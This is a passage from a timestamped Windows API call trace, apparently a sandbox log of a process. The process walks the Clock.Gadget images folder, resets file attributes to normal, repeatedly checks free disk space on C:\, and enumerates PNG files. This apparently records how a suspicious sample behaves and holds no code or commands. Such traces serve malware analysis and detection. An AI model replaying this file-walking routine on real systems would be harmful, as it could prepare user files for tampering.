lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.367] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png", dwFileAttributes=0x80) returned 0 [0132.369] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.376] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system.png", dwFileAttributes=0x80) returned 0 [0132.380] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.384] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png", dwFileAttributes=0x80) returned 0 [0132.386] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.390] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png", dwFileAttributes=0x80) returned 0 [0132.392] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.396] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png", dwFileAttributes=0x80) returned 0 [0132.399] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.404] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png", dwFileAttributes=0x80) returned 0 [0132.406] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.413] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png", dwFileAttributes=0x80) returned 0 [0132.415] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.421] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png", dwFileAttributes=0x80) returned 0 [0132.423] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.428] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png", dwFileAttributes=0x80) returned 0 [0132.431] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.436] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png", dwFileAttributes=0x80) returned 0 [0132.438] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.442] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png", dwFileAttributes=0x80) returned 0 [0132.444] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.456] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png", dwFileAttributes=0x80) returned 0 [0132.459] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0132.465] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png", dwFileAttributes=0x80) returned 0 [0132.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x183db300, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18401460, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44cd7dc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb44cd7dc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb44cd7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer.png", cAlternateFileName="")) returned 1 [0132.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6d6ed, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c6d6ed, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44f393c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x132, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_dot.png", cAlternateFileName="")) returned 1 [0132.467] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c2142f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c2142f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44f393c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_h.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c4758e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c4758e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4bf19dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_m.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6d6ed, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c6d6ed, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e2ce7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_s.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c9384c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c9384c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e52fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7454, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_settings.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e52fdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x77b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cdfb0a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cdfb0a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e7913c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_dot.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e7913c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_h.png", cAlternateFileName="")) returned 1 [0132.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cb99ab, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cb99ab, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e9f29c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_m.png", cAlternateFileName="")) returned 1 [0132.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8cdfb0a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8cdfb0a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ec53fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_s.png", cAlternateFileName="")) returned 1 [0132.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d05c69, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d05c69, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4eeb55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="diner_settings.png", cAlternateFileName="")) returned 1 [0132.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d05c69, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d05c69, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4eeb55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x876e, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower.png", cAlternateFileName="")) returned 1 [0132.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d51f27, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d51f27, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4eeb55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x141, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_dot.png", cAlternateFileName="")) returned 1 [0132.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d2bdc8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d2bdc8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f3781c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x184, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_h.png", cAlternateFileName="")) returned 1 [0132.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d2bdc8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d2bdc8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_m.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d2bdc8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d2bdc8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc14, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_s.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d51f27, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d51f27, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x827b, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_settings.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d78086, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d78086, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4f83adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3cfe, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8dc4344, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8dc4344, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_dot.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d78086, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d78086, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_h.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d9e1e5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d9e1e5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_m.png", cAlternateFileName="")) returned 1 [0132.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d9e1e5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8d9e1e5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fa9c3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbde, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_s.png", cAlternateFileName="")) returned 1 [0132.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8dea4a3, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8dea4a3, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fcfd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x51d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="modern_settings.png", cAlternateFileName="")) returned 1 [0132.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e10602, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e10602, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fcfd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6408, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty.png", cAlternateFileName="")) returned 1 [0132.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e5c8c0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e5c8c0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4fcfd9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb57, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_dot.png", cAlternateFileName="")) returned 1 [0132.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e36761, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e36761, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_h.png", cAlternateFileName="")) returned 1 [0132.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e36761, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e36761, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_m.png", cAlternateFileName="")) returned 1 [0132.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e5c8c0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e5c8c0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb67, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_s.png", cAlternateFileName="")) returned 1 [0132.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e82a1f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e82a1f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4ff5efc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x702e, dwReserved0=0x0, dwReserved1=0x0, cFileName="novelty_settings.png", cAlternateFileName="")) returned 1 [0132.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_bottom.png", cAlternateFileName="")) returned 1 [0132.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_left.png", cAlternateFileName="")) returned 1 [0132.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9025934, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9025934, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_divider_right.png", cAlternateFileName="")) returned 1 [0132.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9025934, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9025934, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb501c05c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_left.png", cAlternateFileName="")) returned 1 [0132.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb904ba93, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb904ba93, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_right.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb904ba93, 